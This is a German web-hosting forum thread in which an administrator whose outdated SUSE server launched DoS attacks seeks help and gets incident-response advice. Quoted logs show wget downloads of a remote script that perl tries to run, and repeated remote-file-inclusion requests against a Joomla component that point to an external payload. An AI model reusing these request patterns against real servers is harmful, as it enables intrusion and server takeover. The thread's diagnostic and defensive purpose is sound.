Brauche dringend Hilfe - DOS Attacken von meinem Server aus

[fulltilt]

Habe gestern und heute 2 mal eine Halbsperre von Strato Abuse bekommen DOS Attacken von meinem Server. Habe gestern alle Passwörter geändert und ssh deaktiviert - in der Nacht gabs dann wieder Probleme.
Welche Ordner bzw. Dateien sollte ich löschen und was kann ich am besten tun um das Problem zu lösen? (SUSE 9.0 - Confixx)
Ich habe jetzt folgendes im Apache Log gefunden - könnte das der Auslöser sein ?

Code: Select all

perl(12725): Operation not permitted
--19:41:03--  http://www.extremus.info/trash/out.txt
           => `out.txt'
Resolving www.extremus.info... done.
Connecting to www.extremus.info[80.72.80.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,662 [text/plain]

    0K .......... .......... ........                        100%  185.68 KB/s

19:41:04 (185.68 KB/s) - `out.txt' saved [29662/29662]



--01:43:54--  http://www.extremus.info/x/out.txt
           => `out.txt'
Resolving www.extremus.info... done.
Connecting to www.extremus.info[80.72.80.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,708 [text/plain]

    0K .......... .......... .........                       100%  358.17 KB/s

01:43:54 (358.17 KB/s) - `out.txt' saved [29708/29708]

--01:44:50--  http://www.extremus.info/x/out.txt
           => `out.txt'
Resolving www.extremus.info... done.
Connecting to www.extremus.info[80.72.80.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,708 [text/plain]

    0K .......... .......... .........                       100%  290.12 KB/s

01:44:50 (290.12 KB/s) - `out.txt' saved [29708/29708]

--01:45:32--  http://www.extremus.info/x/out.txt
           => `out.txt'
Resolving www.extremus.info... done.
Connecting to www.extremus.info[80.72.80.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,708 [text/plain]

    0K .......... .......... .........                       100%  290.12 KB/s

01:45:32 (290.12 KB/s) - `out.txt' saved [29708/29708]

--01:47:49--  http://www.extremus.info/x/out.txt
           => `out.txt'
Resolving www.extremus.info... done.
Connecting to www.extremus.info[80.72.80.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,708 [text/plain]

    0K .......... .......... .........                       100%  290.12 KB/s

01:47:49 (290.12 KB/s) - `out.txt' saved [29708/29708]

--01:48:11--  http://www.extremus.info/x/out.txt
           => `out.txt'
Resolving www.extremus.info... done.
Connecting to www.extremus.info[80.72.80.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,708 [text/plain]

    0K .......... .......... .........                       100%  318.81 KB/s

01:48:11 (318.81 KB/s) - `out.txt' saved [29708/29708]

--01:48:11--  http://www.extremus.info/x/out.txt
           => `out.txt.1'
Resolving www.extremus.info... done.
Connecting to www.extremus.info[80.72.80.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,708 [text/plain]

    0K .......... .......... .........                       100%  193.41 KB/s

01:48:11 (193.41 KB/s) - `out.txt.1' saved [29708/29708]

Can't open perl script "out.txt": No such file or directory

[duergner]

Daten sichern und neu initialisieren.

[mattiass]

Habe gestern und heute 2 mal eine Halbsperre von Strato Abuse bekommen DOS Attacken von meinem Server. Habe gestern alle Passwörter geändert und ssh deaktiviert - in der Nacht gabs dann wieder Probleme.
Welche Ordner bzw. Dateien sollte ich löschen und was kann ich am besten tun um das Problem zu lösen? (SUSE 9.0 - Confixx)
Ich habe jetzt folgendes im Apache Log gefunden - könnte das der Auslöser sein ?

Da laufen irgendwelche unsicheren Scripte, Bulletin Boards oder ähnliches. Der Angreifer schafft es, über Lücken in diesen Scripten zunächst Downloads mit den Rechten des Webservers zu starten und dann die heruntergeladenen Dateien mit perl o.ä. auszurühren.

Solche Angriffe sind meist in der Hinsicht harmlos, als dass der Angreifer selten versucht, den ganzen Server zu übernehmen, weil er unter den Rechten des Apache-Users tun kann, was er will. Ein erster Ansatzpunkt wäre, zu suchen, ob sich in den Accesslogs zu den Zeiten der Angriffe ungewöhnliche URLs finden. Du kannst damit vielleicht schon herausfinden, über welches CMS/Board etc. der Angreifer arbeitet.

Einfach nur den Server frisch aufzusetzen bringt wenig. Wenn Du das löchrige Board/CMS wieder draufmachst, ist der Angreifer zwei Stunden später wieder da.

[mattiass]

Daten sichern und neu initialisieren.

Jein.

Suse 9.0 wird seit einem halben Jahr nicht mehr mit Patches versorgt, das gehört dringend gegen 9.3 oder höher ausgetauscht, aber wenn das Problem ein löchriges Board war, ist das durch ein simples Neuaufsetzen auch nicht gelöst.

[fulltilt]

Danke für die schnelle Antwort,
Das war ein Auszug aus dem apache log - Sorry wo finde ich die Accesslogs?

[mattiass]

Danke für die schnelle Antwort,
Das war ein Auszug aus dem apache log - Sorry wo finde ich die Accesslogs?

Die tragen meist "accesslog" im Namen und enthalten aufgerufene GET-Parameter. Suche mit:

Code: Select all

find / -name '*access*' -print

Ist das nicht der Fall, muss das LogFormat auf combines umgestellt werden. Was Du gepostet hast scheint eher aus einem Errorlog zu stammen, denn dort werden STDERR-Ausgaben aufgerufener Scripte protokolliert.

[fulltilt]

Hallo Mattias,

Hab die logs gefunden. Ich habe vorerst einmal alle CMS Systeme gelöscht und kämpfe mich nun einmal durch die Logs.
Hoffe das die mich heute nacht nicht wieder sperren müssen :-)
Na ja wenns wieder passiert, muss ich wohl doch das System neu aufsetzen.
Danke für Deine Hilfe.

Ralph

[mattiass]

Hab die logs gefunden. Ich habe vorerst einmal alle CMS Systeme gelöscht und kämpfe mich nun einmal durch die Logs.
Hoffe das die mich heute nacht nicht wieder sperren müssen :-)
Na ja wenns wieder passiert, muss ich wohl doch das System neu aufsetzen.

Das System musst Du sowieso in den nächsten Tagen neu aufsetzen, weil Suse 9.0 schon arg alt ist und eben nicht mehr mit Updates versorgt wird. Eine 10.1 ist aber schnell installiert (wenn Du bei Suse bleiben möchtest).

In der Tat ist es jetzt aber erstmal wichtig anhand der Logs herauszufinden, welche Scriptschwachstelle ausgenutzt wurde.

[duergner]

Dafuer laesst man aber den Server nicht oben. Wofuer gibt es denn ein Rescue System?!?

[fulltilt]

Habe ne Online Auktion und einen Email Service drauf laufen ... daher kann ich nicht alles abschalten. Ich habe jetzt alles an CMS und Formularen gelöscht und hoffe das dies der Grund war. Ich werde aber einen neuen Server aufsetzen und die Webs dann nach und nach rüberholen.

[mattiass]

Habe ne Online Auktion und einen Email Service drauf laufen ... daher kann ich nicht alles abschalten. Ich habe jetzt alles an CMS und Formularen gelöscht und hoffe das dies der Grund war. Ich werde aber einen neuen Server aufsetzen und die Webs dann nach und nach rüberholen.

Oh Mann, dann sind diese Dienste halt mal ein paar Stunden down.

Anstatt zu löschen solltest Du lieber die Ursachen suchen. Bei der Art der geschilderten Angriffe sollten diese leicht zu finden sein.

[fulltilt]

Bin gerade dabei alle logs zu checken.
Schon mal etwas über die gehört?
http://www.extremus.info[80.72.80.162]:80... connected
Ist irgend ein russisches Portal ... muss auch rausfinden wer genau das verursacht wg. Strafanzeige usw.
Der Server lief seit 3 Jahren problemlos, bis ich vor 2 Wochen 3 Joomla Portale installiert habe ...
Ich melde mich wennn ich mehr weiss.

[mattiass]

Bin gerade dabei alle logs zu checken.
Schon mal etwas über die gehört?
http://www.extremus.info[80.72.80.162]:80... connected

Das ist ein Script, das eine Hintertüre mit Shell installiert. Nix wildes...

Ist irgend ein russisches Portal ... muss auch rausfinden wer genau das verursacht wg. Strafanzeige usw.

Logdateien lesen. Aber Du wirst mit einer Strafanzeige nicht weit kommen, wenn der Angreifer bspw. über den gehackten Server einer moldawischen Universität kommt.

Der Server lief seit 3 Jahren problemlos, bis ich vor 2 Wochen 3 Joomla Portale installiert habe ...
Ich melde mich wennn ich mehr weiss.

Ja, Joomla könnte die Ursache sein. Das Problem bei der alten Suse ist aber auch, dass wenn jemand erstmal ne Shell hat, dieser jemand vielleicht eine ungepatchte Sicherheitslücke findet, mit der er Root-Rechte erlangen kann. Deshalb: schnell weg von der alten Suse...

[duergner]

Habe ne Online Auktion und einen Email Service drauf laufen ... daher kann ich nicht alles abschalten. Ich habe jetzt alles an CMS und Formularen gelöscht und hoffe das dies der Grund war. Ich werde aber einen neuen Server aufsetzen und die Webs dann nach und nach rüberholen.

Bist du dann bitte so freundlich, mir deine IP Adresse zukommen zu lassen, damit ich dann gleich weiss ob der naechste Angriff bei mir von dir kommt. Sowas ist unverantwortlich. DU faehrst eine Distribution die seit laengerem keine Sichterheitsupdates mehr zur Verfuegung stellt, du hast einen konkreten Hinweis drauf, dass jemand auf deinem Server war und weigerst dich immer noch, diesen vom Netz zu nehmen.

Kannst du denn sicherstellen, dass neben dem DOS Tool nicht auch noch eine Backdoor installiert wurde und wie Matthias schon geschrieben hat nicht durch einen aelteren root Exploit auch schon root Rechte vorhanden sind?

[fulltilt]

Habe die logs jetzt alle durch - ist nicht ungewöhnliches zu finden.
Bis auf dies hier:

"

Code: Select all

72.232.85.82 - - [12/Sep/2006:14:11:39 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kosova-internets.com/lnx/e.dat? HTTP/1.1" 401 1312 "-" "libwww-perl/5.805"
72.232.50.202 - - [12/Sep/2006:14:13:15 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kosova-internets.com/lnx/e.dat? HTTP/1.1" 401 1312 "-" "libwww-perl/5.805"
66.235.219.115 - - [12/Sep/2006:14:13:41 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kosova-internets.com/lnx/e.dat? HTTP/1.1" 401 1312 "-" "libwww-perl/5.805"
193.29.77.101 - - [12/Sep/2006:14:14:22 +0200] "GET / HTTP/1.0" 200 853 "http://www.plaza.lu" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)"
67.15.2.86 - - [12/Sep/2006:14:14:49 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kosova-internets.com/lnx/e.dat? HTTP/1.1" 401 1312 "-" "libwww-perl/5.805"
64.118.85.17 - - [12/Sep/2006:14:15:04 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kosova-internets.com/lnx/e.dat? HTTP/1.1" 401 1312 "-" "libwww-perl/5.805"
72.18.132.73 - - [12/Sep/2006:14:16:04 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kosova-internets.com/lnx/e.dat? HTTP/1.1" 401 1312 "-" "libwww-perl/5.805"
67.15.6.3 - - [12/Sep/2006:14:16:46 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kosova-internets.com/lnx/e.dat? HTTP/1.1" 401 1312 "-" "libwww-perl/5.805"

[theomega]

Hallo Leute,
ich mag es ja echt gerne den Quelltext von diesen "Rootkits" durchzulesen. Meistens ja sehr einfach gestrickt, es wird eine Verbindung zu einem IRC-Server aufgebaut. Dann kann man diverse einfache Befehle (Portscan usw) an den Server schicken, außerdem können Shellbefehle ausgeführt werden. Wer es sich mal anschaun will, der kann ja einfach mal dem IRC-Chanel beitreten, ich probier jetzt nicht aus ob ich die Server auch kontrolieren kann, aber man könnte zumindest die Server-Admins warnen.

Interessant ist nur die Frage: Wiso sind die scripts eigentlich immer von Portugiesen/Spanieren (kann ich leider nicht unterscheiden, spreche keines davon) geschrieben? Die Comments sind immer in der gleichen Sprache!

[mattiass]

Interessant ist nur die Frage: Wiso sind die scripts eigentlich immer von Portugiesen/Spanieren (kann ich leider nicht unterscheiden, spreche keines davon) geschrieben? Die Comments sind immer in der gleichen Sprache!

Habe auch schon welche auf Rumänisch (kann auch moldawisch gewesen sein, hihi) gesehen. Da kapiere ich dann auch ab und an etwas. Abser stimmt: portugiesisch scheint am weitesten verbreitet.

Ich vermute, dass da eine Hand voll Scripte seit Jahren im Einsatz sind. Wirklich komplex sind deren Aufgaben ja nicht und kleinere Anpassungen erfordern keine Anpassung der Kommentare. Ist wie bei OpenOffice: da finden sich AFAIK auch noch viele Kommentare auf Deutsch.

[fulltilt]

Bringts was den kompletten Server mit einem Virenscanner zu checken?

[theomega]

Lies bitte nochmal was alle geschrieben habe bis jetzt:
Du kannst niemals sicher sein das du den Hack komplett entfernt hast sollange du nicht den kompletten Server neu aufsetztst. Mit der entsprechenden Planung kannst du ohne Zusätzlichen Geldaufwand die Downtime auf ne halbe Stunde verringern, wenn du Geld ausgibst für einen zweiten Server auf unter einer Sekunde. Allerdings setzt das (wie auch das gesamte Neuaufsetzten des Servers) ein technisches Können in Bezug auf Linux-Server vorraus und wenn ich ehrlich machen deine Äußerungen oben nicht den Eindruck als hättest du das wissen. Also überleg dir jetzt zwei Sachen:
1. Willst du dich jetzt um das Problem kümmern und aus der Welt schaffen oder willst du jetzt die Seite um jeden Preis online halten und nacher wenn die Polizei vor deiner Türe steht dich drum kümmern und versuchen zu lösen
2. Bist du wirklich in der Lage den Server zu warten und vor allem sicher zu halten? Solltest du dir nicht lieber jemand anderes suchen der das kann?

[fulltilt]

Das habe ich ja bereits oben erwähnt das ein neuer Server aufgesetzt wird. Ich muss aber sicher sein das der ganze Mist nicht wieder von vorne losgeht, wenn die Webs wieder online gehen. Also nochmal - Mir ist KLAR das ich das Ding nicht halten kann oder will, weil veraltetes System.
Es nützt wohl nix wenn ich einen neuen Server aufsetze und die Ursache in irgend einem Web liegt. Trotzdem Danke für die Ermahnung.

[theomega]

Du müsstest alle Scripte durchgehen, das sind ja einfache Fehler in einen Scripten, da findet kein Scanner, da ist Handarbeit angesagt. Was haste den an Software im Einsatz? PHPNuke? Oder alles selbstprogrammiert?

[mattiass]

Bringts was den kompletten Server mit einem Virenscanner zu checken?

Virenscanner, was ist das? Ist das nicht Schlangenöl aus der Windows-Welt?

Rootkits wirst Du so kaum finden und Backdoor-Scripte kaum. Einen hinterrücks per Init-Script gestarteten Dropbear auf einem aunverfänglichen Port dürfte der Virenscanner genausowenig finden, wie Perl-Scripte, die simple Shells zur Verfügung stellen.

Auf gut Deutsch: nein, es bringt nix.

Und was die Webseiten mit Joomla angeht: wenn Du Glück hast, war eine veraltete Version verantwortlich, und es genügt eine aktuelle zu installieren. Wenn Du Pech hast, ist der Angreifer über eine Lücke gekommen, die noch nicht gefixt ist und Du darfst selbst suchen. Das ist ein Haufen Arbeit.

[fulltilt]

Hast recht mit dem manuellen Checks der Scripte ... Ich dachte halt wenn irgend ein Bot etwas auf den Server geladen hat - wohin auch immer ... ob das ein Virenscanner checkt?
Na ja - ich hatte bis vor 3 Stunden - 3 Joomla Portale drauf und wie gesagt damit hats angefangen - ist also nicht zu empfehlen.
Ansonsten laufen noch 2 Oscommerce Shops und eine Online Auktion PHPPROBID.
Ich tippe aber darauf das irgendein Joomla Modul das Problem ausgelöst hat. Ich werde dieses CMS wohl nicht mehr verwenden.
Die Kiste ist über 3 Jahre einwandfrei gelaufen ohne Ausfälle.

Ralph

[captaincrunch]

Abser stimmt: portugiesisch scheint am weitesten verbreitet.

Jap, vor allem die Brasilianer sind zur Zeit wieder mächtig aktiv.

[mattiass]

Abser stimmt: portugiesisch scheint am weitesten verbreitet.

Jap, vor allem die Brasilianer sind zur Zeit wieder mächtig aktiv.

Wenn ich Brasilianer wäre und die Wahl hätte, ich würde Poca-Pocas bauen:

http://www.geo.de/GEO/kultur/geo_tv/2338.html?t=print

Kann sein, dass das daran liegt, dass ich eigentlich KFZ-Mechaniker und kein Unix-Pro bin. :lol: